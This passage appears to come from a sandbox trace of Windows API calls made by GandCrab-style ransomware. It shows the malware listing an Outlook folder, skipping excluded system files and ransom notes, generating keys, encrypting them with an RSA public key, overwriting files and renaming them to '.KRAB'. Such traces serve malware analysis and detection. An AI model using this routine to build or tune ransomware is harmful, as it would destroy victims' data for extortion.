DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0061.527] WriteFile (in: hFile=0x3ac, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0061.528] CloseHandle (hObject=0x3ac) returned 1 [0061.528] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.528] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.529] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x8, wMilliseconds=0x2d8)) [0061.529] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.529] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0061.529] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0061.529] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\d2ca4a08d2ca4dee3d.lock") returned 79 [0061.529] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\outlook\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3ac [0061.530] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.530] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.530] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\") returned 56 [0061.530] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\*" [0061.530] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd1a0 [0061.530] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.530] FindNextFileW (in: hFindFile=0xfbd1a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0061.530] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0061.531] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.531] FindNextFileW (in: hFindFile=0xfbd1a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0061.531] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0061.531] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0061.531] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\d2ca4a08d2ca4dee3d.lock" [0061.531] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.531] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 84 [0061.531] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\d2ca4a08d2ca4dee3d.lock") returned 79 [0061.531] lstrlenW (lpString=".lock") returned 5 [0061.531] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.531] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0061.532] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.532] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.532] FindNextFileW (in: hFindFile=0xfbd1a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0061.532] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0061.532] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0061.532] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\KRAB-DECRYPT.txt" [0061.532] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.532] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\KRAB-DECRYPT.txt.KRAB") returned 77 [0061.532] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\KRAB-DECRYPT.txt") returned 72 [0061.533] lstrlenW (lpString=".txt") returned 4 [0061.533] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.533] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0061.533] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.533] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\KRAB-DECRYPT.txt") returned 72 [0061.533] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\KRAB-DECRYPT.txt") returned 72 [0061.533] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0061.533] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0061.533] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0061.533] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0061.533] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0061.533] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0061.533] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0061.533] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0061.534] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0061.534] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0061.534] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.534] FindNextFileW (in: hFindFile=0xfbd1a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0061.534] lstrcmpW (lpString1="Outlook.srs", lpString2=".") returned 1 [0061.534] lstrcmpW (lpString1="Outlook.srs", lpString2="..") returned 1 [0061.534] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\", lpString2="Outlook.srs" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs" [0061.534] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.534] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs.KRAB") returned 72 [0061.534] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs") returned 67 [0061.534] lstrlenW (lpString=".srs") returned 4 [0061.534] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.535] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".srs ") returned 5 [0061.535] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.535] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs") returned 67 [0061.535] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs") returned 67 [0061.535] lstrcmpiW (lpString1="Outlook.srs", lpString2="desktop.ini") returned 1 [0061.535] lstrcmpiW (lpString1="Outlook.srs", lpString2="autorun.inf") returned 1 [0061.535] lstrcmpiW (lpString1="Outlook.srs", lpString2="ntuser.dat") returned 1 [0061.535] lstrcmpiW (lpString1="Outlook.srs", lpString2="iconcache.db") returned 1 [0061.535] lstrcmpiW (lpString1="Outlook.srs", lpString2="bootsect.bak") returned 1 [0061.535] lstrcmpiW (lpString1="Outlook.srs", lpString2="boot.ini") returned 1 [0061.535] lstrcmpiW (lpString1="Outlook.srs", lpString2="ntuser.dat.log") returned 1 [0061.535] lstrcmpiW (lpString1="Outlook.srs", lpString2="thumbs.db") returned -1 [0061.535] lstrcmpiW (lpString1="Outlook.srs", lpString2="KRAB-DECRYPT.html") returned 1 [0061.535] lstrcmpiW (lpString1="Outlook.srs", lpString2="KRAB-DECRYPT.txt") returned 1 [0061.535] lstrcmpiW (lpString1="Outlook.srs", lpString2="CRAB-DECRYPT.txt") returned 1 [0061.535] lstrcmpiW (lpString1="Outlook.srs", lpString2="ntldr") returned 1 [0061.535] lstrcmpiW (lpString1="Outlook.srs", lpString2="NTDETECT.COM") returned 1 [0061.536] lstrcmpiW (lpString1="Outlook.srs", lpString2="Bootfont.bin") returned 1 [0061.536] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.536] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0xfbca08) returned 1 [0061.537] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0061.537] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0061.538] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0061.538] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0061.538] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.538] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.538] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0xfbca08) returned 1 [0061.538] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0061.539] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0061.539] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0061.539] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0061.539] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.539] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.539] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0xfbca08) returned 1 [0061.540] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd1e0) returned 1 [0061.540] CryptGetKeyParam (in: hKey=0xfbd1e0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0061.540] CryptEncrypt (in: hKey=0xfbd1e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0061.540] GetLastError () returned 0x0 [0061.540] CryptDestroyKey (hKey=0xfbd1e0) returned 1 [0061.540] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.540] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0xfbca08) returned 1 [0061.541] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd360) returned 1 [0061.541] CryptGetKeyParam (in: hKey=0xfbd360, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0061.541] CryptEncrypt (in: hKey=0xfbd360, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0061.541] GetLastError () returned 0x0 [0061.541] CryptDestroyKey (hKey=0xfbd360) returned 1 [0061.541] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.541] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\outlook\\outlook.srs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0061.542] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0061.543] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0061.543] ReadFile (in: hFile=0x440, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ea7c*=0xa00, lpOverlapped=0x0) returned 1 [0061.589] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0xfffff600, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.589] WriteFile (in: hFile=0x440, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ea78*=0xa00, lpOverlapped=0x0) returned 1 [0061.589] WriteFile (in: hFile=0x440, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0061.590] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.593] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.594] CloseHandle (hObject=0x440) returned 1 [0061.609] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.610] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\outlook\\outlook.srs"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\outlook\\outlook.srs.krab")) returned 1 [0061.613] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.613] FindNextFileW (in: hFindFile=0xfbd1a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0061.613] lstrcmpW (lpString1="Outlook.xml", lpString2=".") returned 1 [0061.613] lstrcmpW (lpString1="Outlook.xml", lpString2="..") returned 1 [0061.613] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\", lpString2="Outlook.xml" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" [0061.613] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.614] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.KRAB") returned 72 [0061.614] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned 67 [0061.614] lstrlenW (lpString=".xml") returned 4 [0061.614] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.614] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".xml ") returned 5 [0061.614] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.615] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned 67 [0061.615] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned 67 [0061.615] lstrcmpiW (lpString1="Outlook.xml", lpString2="desktop.ini") returned 1 [0061.615] lstrcmpiW (lpString1="Outlook.xml", lpString2="autorun.inf") returned 1 [0061.615] lstrcmpiW (lpString1="Outlook.xml", lpString2="ntuser.dat") returned 1 [0061.615] lstrcmpiW (lpString1="Outlook.xml", lpString2="iconcache.db") returned 1 [0061.615] lstrcmpiW (lpString1="Outlook.xml", lpString2="bootsect.bak") returned 1 [0061.615] lstrcmpiW (lpString1="Outlook.xml", lpString2="boot.ini") returned 1 [0061.615] lstrcmpiW (lpString1="Outlook.xml", lpString2="ntuser.dat.log") returned 1 [0061.615] lstrcmpiW (lpString1="Outlook.xml", lpString2="thumbs.db") returned -1 [0061.615] lstrcmpiW (lpString1="Outlook.xml", lpString2="KRAB-DECRYPT.html") returned 1 [0061.615] lstrcmpiW (lpString1="Outlook.xml", lpString2="KRAB-DECRYPT.txt") returned 1 [0061.615] lstrcmpiW (lpString1="Outlook.xml", lpString2="CRAB-DECRYPT.txt") returned 1 [0061.615] lstrcmpiW (lpString1="Outlook.xml", lpString2="ntldr") returned 1 [0061.615] lstrcmpiW (lpString1="Outlook.xml", lpString2="NTDETECT.COM") returned 1 [0061.615] lstrcmpiW (lpString1="Outlook.xml", lpString2="Bootfont.bin") returned 1 [0061.615] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.616] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0xfbca08) returned 1 [0061.616] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0061.617] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0061.617] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0061.617] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0061.617] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.617] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.617] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0xfbca08) returned 1 [0061.618] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0061.618] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0061.618] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0061.618] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0061.618] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.618] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.619] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0xfbca08) returned 1 [0061.619] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd4a0) returned 1 [0061.619] CryptGetKeyParam (in: hKey=0xfbd4a0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0061.619] CryptEncrypt (in: hKey=0xfbd4a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0061.620] GetLastError () returned 0x0 [0061.620] CryptDestroyKey (hKey=0xfbd4a0) returned 1 [0061.620] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.620] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0xfbca08) returned 1 [0061.620] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd1e0) returned 1 [0061.620] CryptGetKeyParam (in: hKey=0xfbd1e0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0061.620] CryptEncrypt (in: hKey=0xfbd1e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0061.621] GetLastError () returned 0x0 [0061.621] CryptDestroyKey (hKey=0xfbd1e0) returned 1 [0061.621] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.621] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0061.622] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0061.622] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0061.623] ReadFile (in: hFile=0x440, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ea7c*=0x956, lpOverlapped=0x0) returned 1 [0061.675] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0xfffff6aa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.675] WriteFile (in: hFile=0x440, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x956, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ea78*=0x956, lpOverlapped=0x0) returned 1 [0061.675] WriteFile (in: hFile=0x440, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0061.675] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.679] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.680] CloseHandle (hObject=0x440) returned 1 [0061.681] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.681] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: 